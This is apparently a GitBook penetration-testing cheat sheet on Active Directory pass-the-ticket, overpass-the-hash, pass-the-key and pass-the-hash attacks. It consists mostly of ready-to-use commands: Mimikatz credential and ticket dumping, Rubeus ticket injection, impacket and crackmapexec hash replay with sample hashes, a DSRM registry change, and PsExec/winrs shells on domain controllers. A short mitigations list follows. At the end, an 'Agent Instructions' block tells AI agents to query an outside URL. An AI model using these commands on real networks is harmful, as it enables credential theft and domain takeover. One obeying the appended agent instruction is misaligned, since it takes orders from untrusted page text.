# PTH, PTT, Overpth, ptk

### Pass-the-Ticket

### **Harvesting tickets from Linux**

```markdown
## Extract ticket
privilege::debug => sekurlsa::tickets /export
#or
.\Rubeus dump
```

### Inject ticket into current session

```powershell
kerberos::ptt [0;304edb]-2-0-40e10000-Administrator@krbtgt-WARGREY.MON.kirbi
klist
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd
.\winrs.exe -r:<any other dc> cmd.exe

```

#### Rubeus

{% code overflow="wrap" %}

```
.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi

.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd
```

{% endcode %}

Reference: [Experimenting with Kerberos Ticket Formats](https://tw1sm.github.io)

***

### Overpass The Hash/Pass The Key (PTK)

### **Linux**

<pre class="language-bash" data-overflow="wrap"><code class="lang-bash"><strong>impacket-getTGT hacktor.local/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
</strong><strong>
</strong>export KRB5CCNAME=/root/velociraptor.ccache
impacket-psexec hacktor.local/velociraptor@labwws02.jurassic.park -k -no-pass
</code></pre>

### **Windows**

{% code overflow="wrap" %}

```bash
.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt

.\PsExec.exe -accepteula \\labwws02.hacktor.local cmd
```

{% endcode %}

### Obtain encryption key

```powershell
privilege::debug => sekurlsa::ekeys
```

#### RC4 algorithm

```bash
sekurlsa::pth /user:Administrator /domain:pdc.wargrey.mon /rc4:96ea24eff4dff1fbe13818fbf12ea7d8 /run:powershell.exe
```

#### AES128

```plaintext
sekurlsa::pth /user:Administrator /domain:pdc.wargrey.mon /aes128:b65ea8151f13a31d01377f5934bf3883 /run:powershell.exe
```

#### AES256

```plaintext
sekurlsa::pth /user:Administrator /domain:pdc.wargrey.mon /aes256:b54259bbff03af8d37a138c375e29254a2ca0649337cc4c73addcd696b4cdb65 /run:powershell.exe
```

```plaintext
winrs.exe -r:<any other dc> cmd.exe
```

#### Using Rubeus

```plaintext
Rubeus.exe asktgt /user:administrator /rc4:ntlmhash /ptt
Rubeus.exe asktgt /user:administrator/aes256:ntlmhash /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
Rubeus.exe ptt /ticket:base64
```

***

## Pass-the-hash

### Linux

#### Pass The Hash using crackmapexec  or NXC

Since we have the hashes, we can use the hashes directly without the need for cracking them. Use the following command for crackmapexec

```bash
crackmapexec -u "USER NAME" -H HASH --local-auth

#ex
crackmapexec -u "Frank Castle" -H 40739aa18503c6fcf8c7e9d434af2361 --local-auth
```

Running this will attempt to Pass The Hash to the machines in the network and tell which machine accepted the hash for the specified user.

<figure><img src="https://www.hackingloops.com/wp-content/uploads/2023/03/8-1024x147.png" alt="" height="105" width="735"><figcaption></figcaption></figure>

Here it does not tell <mark style="color:orange;">**`Pwned`**</mark>**`!`** rather we can see a green plus sign **(+)** which indicates that there’s a good chance that the attack worked. Pwned determines the confirmed success of the attack.

This can further be used in <mark style="color:red;">**`psexec`**</mark> to gain shell access through the command

{% code overflow="wrap" %}

```bash
impacket-psexec "USER NAME":@TARGET_IP -hashes FULL_NTLM_HASH

impacket-psexec "Frank Castle":@192.168.37.141 -hashes aad3b435b51404eeaad3b435b51404ee:40739aa18503c6fcf8c7e9d434af2361
```

{% endcode %}

<figure><img src="https://www.hackingloops.com/wp-content/uploads/2023/03/9.png" alt="" height="206" width="1009"><figcaption></figcaption></figure>

This tries to find a writable share and upload a shell to execute it and get a shell. Even though the user “frank castle” is authenticated but it does not have admin access over the shares.

Trying the same command on another machine 192.168.1.5 gives an authentication failure

<figure><img src="https://www.hackingloops.com/wp-content/uploads/2023/03/10-1024x85.png" alt="" height="63" width="766"><figcaption></figcaption></figure>

This is because we are going with local authentication. Frank Castle has access to this machine but as a domain user, not a local user. But if we get local authentication successful on a machine of Domain Controller, we can do much more.

### &#x20;Windows

```powershell
Invoke-Mimikatz -command '"privilege::debug" "token::elevate" "lsadump::sam""exit"'
Invoke-Mimikatz -command '"privilege::debug" "token::elevate" "sekurlsa::msv""exit"'
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD
```

```markup
mimikatz# token::revert
mimikatz# sekurlsa::pth /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /domain:pdc /run:powershell.exe
mimikatz# sekurlsa::pth /user:Administrator /domain:us.techcorp.local /aes256:<aes256 krbtgt hash> /run:powershell.exe
```

```powershell
SafetyKatz.exe "sekurlsa::pth /user:administrator /domain:us.techcorp.local /aes256:<aes256 krbtgt hash> /run:cmd.exe" “exit”
```

```powershell
Rubeus.exe asktgt /user:SHALBY /rc4:5D88C6E440C1B976A9C1A2EF6AD66083 /ptt
Rubeus.exe asktgt /user:administrator /aes256:<aes256keys> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
SafetyKatz.exe “sekurlsa::pth /user:user /domain:anything.domain.local /aes256:<> /run:cmd.exe” “exit”
```

```markup
winrs -r:dc whoami
winrs -r:dc cmd
```

PtH involved directly authenticating to a host by literally sending the password’s hash to the host during the authentication process, while OPtH is way more subtle as it abuses Kerberos authentication.

### Mitigations for Pass The Hash/Password

Preventing completely is hard but some controls can be implemented to make it difficult for attackers. Following are some suggestions to prevent the Pass The Hash/Password attacks

* Limit account reuse
  * Do not reuse the local admin password
  * Disable Guest and Administrator accounts
  * Limit who is the local administrator
* Utilize strong password
  * Longer passwords
  * Do not use common words
* Privilege Access Management (PAM) limits Pass The Hash/Password attack as the password/hash is strong and constantly rotated
  * Check out/in sensitive accounts only when needed
  * Automatically rotate passwords at each check out and check-in

## overPassTheHash

[Video Reference](https://youtu.be/EA2kod-okIg?si=t6s0OoxRsoGzRcWY)

```
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://h3ckt0r.gitbook.io/0xsec/elite/network-pentest/active-directory/ad-techniques/domain-privesc/pth-ptt-overpth-ptk.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.